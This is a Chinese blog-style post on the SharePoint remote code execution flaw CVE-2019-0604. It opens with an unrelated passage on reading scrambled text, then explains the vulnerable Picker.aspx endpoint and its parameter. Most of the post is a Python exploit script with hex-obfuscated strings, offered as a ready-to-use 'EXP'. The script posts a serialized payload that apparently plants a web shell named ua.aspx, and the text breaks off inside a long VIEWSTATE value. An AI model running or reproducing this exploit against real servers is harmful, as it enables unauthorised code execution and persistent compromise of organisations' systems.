研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后,才发这现里的字全是都乱的。
剑桥大学的研究结果,当单词的字母顺序颠倒时,你仍旧可以明白整个单词的意思。其中重要的是:只要单词的第一个字母和最后一个子字母位置正确即可。其他的可以是完全的乱码,你仍旧可以清楚的完全没有问题的阅读。原因是因为人脑在认知单词的过程中不是依靠辨识字母的顺序,而是从整体来看。
同理,汉字的阅读也会受到大脑先入为主的分析。如果你所看到的句子在大脑中事先有过印象,那么你就能顺利的将它读出。如果句子是大脑之前没有处理过的,那么当然就读不出来拉~
单词里面字母乱序不影响阅读的现象,(中英文适用)学名叫做Typoglycemia,用于描述关于人们阅读行为中的认知过程,已经有半个多世纪的研究了。
最近刚高考完不久,所以会在群里看到一些人说学信息安全需要英文、数学好才能学得好。详见Tips
漏洞信息
Microsoft SharePoint是美国微软(Microsoft)公司的一套企业业务协作平台。该平台用于对业务信息进行整合,并能够共享工作、与他人协同工作、组织项目和工作组、搜索人员和信息。
Microsoft SharePoint 远程代码执行漏洞(CVE-2019-0594、CVE-2019-0604,高危):Microsoft SharePoint软件无法检查应用程序包源标记时触发该漏洞。攻击者可在SharePoint应用程序池和SharePoint服务器中执行任意代码。
影响版本:
攻击入口
ItemPicker Web 控件实际上从来没有在一个 .aspx 页面中使用过。但是看看它基类型的用法,EntityEditorWithPicker,说明在 /_layouts/15/Picker.aspx 应该有一个 Picker.aspx 文件使用了它。
该页面要求使用选择器对话框的类型通过 URL 的 PickerDialogType 参数的形式提供。在这里,可以使用以下两种 ItemPickerDialog 类型中的任何一种:
· Microsoft.SharePoint.WebControls.ItemPickerDialog in Microsoft.SharePoint.dll
· Microsoft.SharePoint.Portal.WebControls.ItemPickerDialog in Microsoft.SharePoint.Portal.dll
利用第一种 PickerDialogType 类型
PoC
当表单提交 ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData 的值以 “__” 为开头时(类似于“_dummy”),
EntityInstanceIdEncoder.DecodeEntityInstanceId(string) 处的断点将显示以下情况:而调用另外一种 ItemPickerDialog 类型时,函数调用栈只是在最上面的两个有所不同。
这表明 ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData 的数据最终出现在了 EntityInstanceIdEncoder.DecodeEntityInstanceId(string) 中。 剩下的只需要拷贝实例 ID 和构造一个 XmlSerializer 的 payload 就可以了。
补充:
作者说只要构造一个XML序列化的Payload就可以了,但是Payload提交到哪里呢?
原文中只说了一半,完整POST以及具体参数如下:
URL: /Picker.aspx?PickerDialogType=控件的程序集限定名
参数: ctl00%24PlaceHolderDialogBodySection%24ctl05%24hiddenSpanData=payload
实际上还需访问Picker.aspx附带的其它参数,测试我不附带其它参数时提交表单是失败的。
此漏洞分析文章出来时就想搭环境测试了,第一天下载APP安装后发现下错了,
加上项目未遇到该程序,搭环境也浪费时间懒得弄,就暂时丢一边了。
今天发现上周已经弄了一半,又重新研究了一下。
详情请看原文,我想以下文章应该不少人看过了吧,所谓原理很多人都能说得出来
就是都在等一个真正能用的EXP吧,哈哈哈,我就是传说中的云黑客“鸡你太美”!
译文(中文): https://www.anquanke.com/post/id/173476
EXP
#cve-2019-0604 SharePoint RCE exploit #date: 20190618 #author: k8gege import urllib import urllib2 import sys import requests url0 = sys.argv[1] url1 = '/_layouts/15/Picker.aspx?PickerDialogType=' url = url0 + url1 shellurl=url0+'/_layouts/15/ua.aspx' exp='x63x76x65x2Dx32x30x31x39x2Dx30x36x30x34x20x53x68x61x72x65x50x6Fx69x6Ex74x20x52x43x45x20x65x78x70x6Cx6Fx69x74' paySpanData='x63x74x6Cx30x30x24x50x6Cx61x63x65x48x6Fx6Cx64x65x72x44x69x61x6Cx6Fx67x42x6Fx64x79x53x65x63x74x69x6Fx6Ex24x63x74x6Cx30x35x24x68x69x64x64x65x6Ex53x70x61x6Ex44x61x74x61'; paySection='x50x6Cx61x63x65x48x6Fx6Cx64x65x72x44x69x61x6Cx6Fx67x42x6Fx64x79x53x65x63x74x69x6Fx6E' ct1='x63x74x6Cx30x30x24' ct2='x24x63x74x6Cx30x35' spver = 'x4Dx69x63x72x6Fx73x6Fx66x74x2Ex53x68x61x72x65x50x6Fx69x6Ex74x2Ex57x65x62x43x6Fx6Ex74x72x6Fx6Cx73x2Ex49x74x65x6Dx50x69x63x6Bx65x72x44x69x61x6Cx6Fx67x2Cx4Dx69x63x72x6Fx73x6Fx66x74x2Ex53x68x61x72x65x50x6Fx69x6Ex74x2Cx56x65x72x73x69x6Fx6Ex3Dx31x35x2Ex30x2Ex30x2Ex30x2Cx43x75x6Cx74x75x72x65x3Dx6Ex65x75x74x72x61x6Cx2Cx50x75x62x6Cx69x63x4Bx65x79x54x6Fx6Bx65x6Ex3Dx37x31x65x39x62x63x65x31x31x31x65x39x34x32x39x63' uapay='x55x73x65x72x2Dx41x67x65x6Ex74' payload1='x5Fx5Fx62x70x38x32x63x31x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x65x32x30x30x33x35x30x30x35x36x30x30x32x37x30x30x36x37x30x30x39x36x30x30x33x36x30x30x35x36x30x30x33x37x30x30x65x32x30x30x39x34x30x30x65x36x30x30x34x37x30x30x35x36x30x30x32x37x30x30x65x36x30x30x31x36x30x30x63x36x30x30x65x32x30x30x35x34x30x30x38x37x30x30x30x37x30x30x31x36x30x30x65x36x30x30x34x36x30x30x35x36x30x30x34x36x30x30x37x35x30x30x32x37x30x30x31x36x30x30x30x37x30x30x30x37x30x30x35x36x30x30x32x37x30x30x30x36x30x30x32x33x30x30x62x35x30x30x62x35x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x37x35x30x30x39x36x30x30x65x36x30x30x34x36x30x30x66x36x30x30x37x37x30x30x33x37x30x30x65x32x30x30x64x34x30x30x31x36x30x30x32x37x30x30x62x36x30x30x35x37x30x30x30x37x30x30x65x32x30x30x38x35x30x30x31x36x30x30x64x36x30x30x63x36x30x30x32x35x30x30x35x36x30x30x31x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x63x32x30x30x30x32x30x30x30x35x30x30x32x37x30x30x35x36x30x30x33x37x30x30x35x36x30x30x65x36x30x30x34x37x30x30x31x36x30x30x34x37x30x30x39x36x30x30x66x36x30x30x65x36x30x30x36x34x30x30x32x37x30x30x31x36x30x30x64x36x30x30x35x36x30x30x37x37x30x30x66x36x30x30x32x37x30x30x62x36x30x30x63x32x30x30x30x32x30x30x36x35x30x30x35x36x30x30x32x37x30x30x33x37x30x30x39x36x30x30x66x36x30x30x65x36x30x30x64x33x30x30x34x33x30x30x65x32x30x30x30x33x30x30x65x32x30x30x30x33x30x30x65x32x30x30x30x33x30x30x63x32x30x30x30x32x30x30x33x34x30x30x35x37x30x30x63x36x30x30x34x37x30x30x35x37x30x30x32x37x30x30x35x36x30x30x64x33x30x30x65x36x30x30x35x36x30x30x35x37x30x30x34x37x30x30x32x37x30x30x31x36x30x30x63x36x30x30x63x32x30x30x30x32x30x30x30x35x30x30x35x37x30x30x32x36x30x30x63x36x30x30x39x36x30x30x33x36x30x30x62x34x30x30x35x36x30x30x39x37x30x30x34x35x30x30x66x36x30x30x62x36x30x30x35x36x30x30x65x36x30x30x64x33x30x30x33x33x30x30x31x33x30x30x32x36x30x30x36x36x30x30x33x33x30x30x38x33x30x30x35x33x30x30x36x33x30x30x31x36x30x30x34x36x30x30x33x33x30x30x36x33x30x30x34x33x30x30x35x36x30x30x33x33x30x30x35x33x30x30x64x35x30x30x63x32x30x30x62x35x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x37x35x30x30x39x36x30x30x65x36x30x30x34x36x30x30x66x36x30x30x37x37x30x30x33x37x30x30x65x32x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x65x32x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30' payload2='x38x37x30x30x64x36x30x30x63x36x30x30x30x32x30x30x36x37x30x30x35x36x30x30x32x37x30x30x33x37x30x30x39x36x30x30x66x36x30x30x65x36x30x30x64x33x30x30x32x32x30x30x31x33x30x30x65x32x30x30x30x33x30x30x32x32x30x30x30x32x30x30x35x36x30x30x65x36x30x30x33x36x30x30x66x36x30x30x34x36x30x30x39x36x30x30x65x36x30x30x37x36x30x30x64x33x30x30x32x32x30x30x35x37x30x30x34x37x30x30x36x36x30x30x64x32x30x30x31x33x30x30x36x33x30x30x32x32x30x30x66x33x30x30x65x33x30x30x64x30x30x30x61x30x30x30x63x33x30x30x35x34x30x30x38x37x30x30x30x37x30x30x31x36x30x30x65x36x30x30x34x36x30x30x35x36x30x30x34x36x30x30x37x35x30x30x32x37x30x30x31x36x30x30x30x37x30x30x30x37x30x30x35x36x30x30x32x37x30x30x66x34x30x30x36x36x30x30x38x35x30x30x31x36x30x30x64x36x30x30x63x36x30x30x32x35x30x30x35x36x30x30x31x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x36x37x30x30x39x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x30x32x30x30x38x37x30x30x64x36x30x30x63x36x30x30x65x36x30x30x33x37x30x30x61x33x30x30x38x37x30x30x33x37x30x30x39x36x30x30x64x33x30x30x32x32x30x30x38x36x30x30x34x37x30x30x34x37x30x30x30x37x30x30x61x33x30x30x66x32x30x30x66x32x30x30x37x37x30x30x37x37x30x30x37x37x30x30x65x32x30x30x37x37x30x30x33x33x30x30x65x32x30x30x66x36x30x30x32x37x30x30x37x36x30x30x66x32x30x30x32x33x30x30x30x33x30x30x30x33x30x30x31x33x30x30x66x32x30x30x38x35x30x30x64x34x30x30x63x34x30x30x33x35x30x30x33x36x30x30x38x36x30x30x35x36x30x30x64x36x30x30x31x36x30x30x64x32x30x30x39x36x30x30x65x36x30x30x33x37x30x30x34x37x30x30x31x36x30x30x65x36x30x30x33x36x30x30x35x36x30x30x32x32x30x30x30x32x30x30x38x37x30x30x64x36x30x30x63x36x30x30x65x36x30x30x33x37x30x30x61x33x30x30x38x37x30x30x33x37x30x30x34x36x30x30x64x33x30x30x32x32x30x30x38x36x30x30x34x37x30x30x34x37x30x30x30x37x30x30x61x33x30x30x66x32x30x30x66x32x30x30x37x37x30x30x37x37x30x30x37x37x30x30x65x32x30x30x37x37x30x30x33x33x30x30x65x32x30x30x66x36x30x30x32x37x30x30x37x36x30x30x66x32x30x30x32x33x30x30x30x33x30x30x30x33x30x30x31x33x30x30x66x32x30x30x38x35x30x30x64x34x30x30x63x34x30x30x33x35x30x30x33x36x30x30x38x36x30x30x35x36x30x30x64x36x30x30x31x36x30x30x32x32x30x30x65x33x30x30x64x30x30x30x61x30x30x30x30x32x30x30x30x32x30x30x63x33x30x30x30x35x30x30x32x37x30x30x66x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x35x36x30x30x34x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x30x37x30x30x35x36x30x30x32x37x30x30x34x37x30x30x39x37x30x30x30x33x30x30x65x33x30x30x64x30x30x30x61x30x30x30x30x32x30x30x30x32x30x30x30x32x30x30x30x32x30x30x63x33x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x39x34x30x30x65x36x30x30x33x37x30x30x34x37x30x30x31x36x30x30x65x36x30x30x33x36x30x30x35x36x30x30x30x32x30x30x38x37x30x30x33x37x30x30x39x36x30x30x61x33x30x30x34x37x30x30x39x37x30x30x30x37x30x30x35x36x30x30x64x33x30x30x32x32x30x30x38x35x30x30x31x36x30x30x64x36x30x30x63x36x30x30x32x35x30x30x35x36x30x30x31x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x32x32x30x30x30x32x30x30x66x32x30x30x65x33x30x30x64x30x30x30x61x30x30x30x30x32x30x30x30x32x30x30x30x32x30x30x30x32x30x30x63x33x30x30x64x34x30x30x35x36x30x30x34x37x30x30x38x36x30x30x66x36x30x30x34x36x30x30x65x34x30x30x31x36x30x30x64x36x30x30x35x36x30x30x65x33x30x30x30x35x30x30x31x36x30x30x32x37x30x30x33x37x30x30' payload3='x61x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x62x33x30x30x31x36x30x30x33x37x30x30x33x37x30x30x35x36x30x30x64x36x30x30x32x36x30x30x63x36x30x30x39x37x30x30x64x33x30x30x64x36x30x30x33x37x30x30x33x36x30x30x66x36x30x30x32x37x30x30x63x36x30x30x39x36x30x30x32x36x30x30x32x32x30x30x64x30x30x30x61x30x30x30x38x37x30x30x64x36x30x30x63x36x30x30x65x36x30x30x33x37x30x30x61x33x30x30x34x34x30x30x39x36x30x30x31x36x30x30x37x36x30x30x64x33x30x30x32x32x30x30x33x36x30x30x63x36x30x30x32x37x30x30x64x32x30x30x65x36x30x30x31x36x30x30x64x36x30x30x35x36x30x30x33x37x30x30x30x37x30x30x31x36x30x30x33x36x30x30x35x36x30x30x61x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x34x34x30x30x39x36x30x30x31x36x30x30x37x36x30x30x65x36x30x30x66x36x30x30x33x37x30x30x34x37x30x30x39x36x30x30x33x36x30x30x33x37x30x30x62x33x30x30x31x36x30x30x33x37x30x30x33x37x30x30x35x36x30x30x64x36x30x30x32x36x30x30x63x36x30x30x39x37x30x30x64x33x30x30x33x37x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x32x32x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x36x37x30x30x39x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x30x32x30x30x38x37x30x30x61x33x30x30x62x34x30x30x35x36x30x30x39x37x30x30x64x33x30x30x32x32x30x30x63x34x30x30x31x36x30x30x35x37x30x30x65x36x30x30x33x36x30x30x38x36x30x30x33x34x30x30x31x36x30x30x63x36x30x30x33x36x30x30x38x36x30x30x32x32x30x30x30x32x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x35x30x30x39x37x30x30x30x37x30x30x35x36x30x30x64x33x30x30x32x32x30x30x62x37x30x30x38x37x30x30x61x33x30x30x34x35x30x30x39x37x30x30x30x37x30x30x35x36x30x30x30x32x30x30x34x34x30x30x39x36x30x30x31x36x30x30x37x36x30x30x61x33x30x30x30x35x30x30x32x37x30x30x66x36x30x30x33x36x30x30x35x36x30x30x33x37x30x30x33x37x30x30x64x37x30x30x32x32x30x30x30x32x30x30x64x34x30x30x35x36x30x30x34x37x30x30x38x36x30x30x66x36x30x30x34x36x30x30x65x34x30x30x31x36x30x30x64x36x30x30x35x36x30x30x64x33x30x30x32x32x30x30x33x35x30x30x34x37x30x30x31x36x30x30x32x37x30x30x34x37x30x30x32x32x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x36x37x30x30x39x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x65x32x30x30x64x34x30x30x35x36x30x30x34x37x30x30x38x36x30x30x66x36x30x30x34x36x30x30x30x35x30x30x31x36x30x30x32x37x30x30x31x36x30x30x64x36x30x30x35x36x30x30x34x37x30x30x35x36x30x30x32x37x30x30x33x37x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x39x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x61x33x30x30x33x35x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x33x36x30x30x64x36x30x30x34x36x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x66x32x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x61x33x30x30x33x35x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x39x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x61x33x30x30x33x35x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x66x32x30x30x33x36x30x30x30x32x30x30x35x36x30x30x33x36x30x30x38x36x30x30x66x36x30x30x30x32x30x30x65x35x30x30x36x32x30x30x31x36x30x30x64x36x30x30x30x37x30x30x62x33x30x30x63x36x30x30x34x37x30x30x62x33x30x30x35x32x30x30x30x34x30x30x30x32x30x30x30x35x30x30x31x36x30x30x37x36x30x30x35x36x30x30x30x32x30x30x63x34x30x30x31x36x30x30x65x36x30x30x37x36x30x30x35x37x30x30x31x36x30x30x37x36x30x30x35x36x30x30x64x33x30x30x32x32x30x30x61x34x30x30x33x37x30x30x33x36x30x30x32x37x30x30x39x36x30x30x30x37x30x30x34x37x30x30x32x32x30x30x30x32x30x30x35x32x30x30x65x35x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x65x35x30x30x36x32x30x30x31x36x30x30x64x36x30x30x30x37x30x30x62x33x30x30x63x36x30x30x34x37x30x30x62x33x30x30x35x32x30x30x36x37x30x30x31x36x30x30x32x37x30x30x30x32x30x30x30x37x30x30x37x37x30x30x34x36x30x30x64x33x30x30x32x32x30x30x34x37x30x30x66x36x30x30x64x36x30x30x32x32x30x30x62x33x30x30x36x37x30x30x31x36x30x30x32x37x30x30x30x32x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x64x33x30x30x32x35x30x30x35x36x30x30x31x37x30x30x35x37x30x30x35x36x30x30x33x37x30x30x34x37x30x30x65x32x30x30x35x35x30x30x33x37x30x30x35x36x30x30x32x37x30x30x31x34x30x30x37x36x30x30x35x36x30x30x65x36x30x30x34x37x30x30x62x33x30x30x39x36x30x30x36x36x30x30x30x32x30x30x38x32x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x65x32x30x30x33x35x30x30x35x37x30x30x32x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x38x32x30x30x30x33x30x30x63x32x30x30x30x32x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x65x32x30x30x39x34x30x30x65x36x30x30x34x36x30x30x35x36x30x30x38x37x30x30x66x34x30x30x36x36x30x30x38x32x30x30x32x32x30x30x64x33x30x30x64x33x30x30x64x33x30x30x32x32x30x30x39x32x30x30x39x32x30x30x64x33x30x30x64x33x30x30x30x32x30x30x30x37x30x30x37x37x30x30x34x36x30x30x39x32x30x30x30x32x30x30x62x37x30x30x36x37x30x30x31x36x30x30x32x37x30x30x30x32x30x30x33x36x30x30x66x36x30x30x34x36x30x30x35x36x30x30x64x33x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30' payload4='x74x6Fx6Dx3Dx3Dx3Dx52x65x73x70x6Fx6Ex73x65x2Ex57x72x69x74x65x28x22x55x41x73x68x65x6Cx6Cx22x29x3B' payload5='x23x64x61x74x65x3Ax20x32x30x31x39x30x36x32x36x20x23x61x75x74x68x6Fx72x3Ax20x6Bx38x67x65x67x65' values = {'__REQUESTDIGEST':'0xF4545A48FA093FD290D386F2E317C72EF439C05EABDC8BDF0D81022DAEFE10FF6D4782A17836870BB0EBF673E71DCD6F7E631A1371319881902FDEF3032A16F4,18 Jun 2019 16:41:35 -0000', '__EVENTTARGET':'', '__EVENTARGUMENT':'', '__spPickerHasReturnValue':'', '__spPickerReturnValueHolder':'', '__VIEWSTATE':'/wEPDwULLTIwNTYyMzI3OTQPZBYCZg9kFgQCBQ9kFgICBQ9kFgJmD2QWAgIBD2QWAmYPFgIeBFRleHQFBlBpY2tlcmQCCQ9kFgICBw9kFgwCAw9kFgJmDxYEHgxFcnJvck1lc3NhZ2VlHgtIdG1sTWVzc2FnZQVpPHNwYW4gY2xhc3M9Im1zLWVycm9yIj5BbiBlcnJvciBvY2N1cnJlZC4gQWRtaW5pc3RyYXRvcnMsIHNlZSB0aGUgc2VydmVyIGxvZyBmb3IgbW9yZSBpbmZvcm1hdGlvbi48L3NwYW4+ZAIFD2QWAmYPZBYCZg9kFgJmD2QWAgIBD2QWAmYPDxYCHwBlFgIeCW9ua2V5ZG93bgW1AXZhciBlPWV2ZW50OyBpZighZSkgZT13aW5kb3cuZXZlbnQ7IGlmKCFicm93c2VyaXMuc2FmYXJpICYmIGUua2V5Q29kZT09MTMpIHsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDdfcXVlcnlCdXR0b24nKS5jbGljaygpOyByZXR1cm4gZmFsc2U7IH1kAgcPZBYCZg8PFgIfAAVpPHNwYW4gY2xhc3M9Im1zLWVycm9yIj5BbiBlcnJvciBvY2N1cnJlZC4gQWRtaW5pc3RyYXRvcnMsIHNlZSB0aGUgc2VydmVyIGxvZyBmb3IgbW9yZSBpbmZvcm1hdGlvbi48L3NwYW4+ZGQCCQ9kFgJmDw8WAh8AZWRkAgsPZBYCZg8PFgIeEkNPTFVNTkRJU1BMQVlOQU1FUxYAZGQCDQ9kFgICAQ9kFgQCAQ8WAh4FdmFsdWUFBkFkZCAtPmQCAw9kFgJmDw8WCh4OQ1VTVE9NUFJPUEVSVFllHgVXaWR0aBsAAAAAAABZQAcAAAAeCUlTQ0hBTkdFRGgeBF8hU0ICgAIeDEVuYWJsZUJyb3dzZWgWGB4OZWRpdG9yT2xkVmFsdWVlHgpSZW1vdmVUZXh0BQZSZW1vdmUfBWUeDU5vTWF0Y2hlc1RleHQFEU5vIE1hdGNoaW5nIEl0ZW1zHgphbGxvd0VtcHR5BQExHg1Nb3JlSXRlbXNUZXh0BQ1Nb3JlIEl0ZW1zLi4uHhhwcmVmZXJDb250ZW50RWRpdGFibGVEaXYFBHRydWUeHXNob3dEYXRhVmFsaWRhdGlvbkVycm9yQm9yZGVyBQVmYWxzZR4LYWxsb3dUeXBlSW4FBWZhbHNlHgppblZhbGlkYXRlBQVmYWxzZR4bRUVBZnRlckNhbGxiYWNrQ2xpZW50U2NyaXB0ZR4eU2hvd0VudGl0eURpc3BsYXlUZXh0SW5UZXh0Qm94BQEwFgICBA8PFgYfBxsAAAAAAABZQAcAAAAeCENzc0NsYXNzBQ1tcy11c2VyZWRpdG9yHwkCggJkFgRmDw8WBB4NVmVydGljYWxBbGlnbgsqJ1N5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVmVydGljYWxBbGlnbgMfCQKAgAhkFgJmD2QWAmYPZBYCZg9kFgJmD2QWBGYPFigeCHRhYmluZGV4BQEwHgdvbmZvY3VzBbEBU3RvcmVPbGRWYWx1ZSgnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScpOyBzYXZlT2xkRW50aXRpZXMoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTsgU3lzLlVJLkRvbUVsZW1lbnQuYWRkQ3NzQ2xhc3ModGhpcywgJ21zLWlucHV0Qm94QWN0aXZlJyk7Hg5hcmlhLW11bHRpbGluZQUEdHJ1ZR4Gb25ibHVyBYEDaWYodHlwZW9mKEV4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKT09J2Z1bmN0aW9uJyl7IGlmKFNob3VsZENhbGxDdXN0b21DYWxsQmFjaygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsZXZlbnQpKXtpZighVmFsaWRhdGVQaWNrZXJDb250cm9sKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jykpe1Nob3dWYWxpZGF0aW9uRXJyb3IoKTtyZXR1cm4gZmFsc2U7fWVsc2Uge0V4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7fX19IFN5cy5VSS5Eb21FbGVtZW50LnJlbW92ZUNzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx4Hb25jbGljawVHb25DbGlja1J3KHRydWUsIHRydWUsZXZlbnQsJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseCG9uY2hhbmdlBT91cGRhdGVDb250cm9sVmFsdWUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseB29uUGFzdGUFOmRvcGFzdGUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnLGV2ZW50KTsfEAUEdHJ1ZR4MQXV0b1Bvc3RCYWNrBQEwHgRyb3dzBQExHgtvbkRyYWdTdGFydAUOY2FuRXZ0KGV2ZW50KTseB29ua2V5dXAFPXJldHVybiBvbktleVVwUncoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseBm9uQ29weQU5ZG9jb3B5KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1JyxldmVudCk7HgV0aXRsZQUURXh0ZXJuYWwgSXRlbSBQaWNrZXIfAwVQcmV0dXJuIG9uS2V5RG93blJ3KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1JywgMywgZmFsc2UsIGV2ZW50KTseCnNwZWxsY2hlY2sFBWZhbHNlHg9jb250ZW50RWRpdGFibGUFBHRydWUeDWFyaWEtaGFzcG9wdXAFBHRydWUeBXN0eWxlBTp3b3JkLXdyYXA6IGJyZWFrLXdvcmQ7b3ZlcmZsb3cteDogaGlkZGVuO292ZXJmbG93LXk6IGF1dG87HgRyb2xlBQd0ZXh0Ym94ZAIBDw8WCh4IVGFiSW5kZXgBAAAfBxsAAAAAAABZQAcAAAAeBFJvd3MCAR8faB8JAoACFhIfGQWxAVN0b3JlT2xkVmFsdWUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTsgc2F2ZU9sZEVudGl0aWVzKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7IFN5cy5VSS5Eb21FbGVtZW50LmFkZENzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx8iBT1yZXR1cm4gb25LZXlVcFJ3KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7HyQFFEV4dGVybmFsIEl0ZW0gUGlja2VyHx0FP3VwZGF0ZUNvbnRyb2xWYWx1ZSgnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScpOx8bBYEDaWYodHlwZW9mKEV4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKT09J2Z1bmN0aW9uJyl7IGlmKFNob3VsZENhbGxDdXN0b21DYWxsQmFjaygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsZXZlbnQpKXtpZighVmFsaWRhdGVQaWNrZXJDb250cm9sKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jykpe1Nob3dWYWxpZGF0aW9uRXJyb3IoKTtyZXR1cm4gZmFsc2U7fWVsc2Uge0V4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7fX19IFN5cy5VSS5Eb21FbGVtZW50LnJlbW92ZUNzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx8oBSJkaXNwbGF5OiBub25lO3Bvc2l0aW9uOiBhYnNvbHV0ZTsgHwMFUHJldHVybiBvbktleURvd25SdygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsIDMsIGZhbHNlLCBldmVudCk7Hx8FATAeGnJ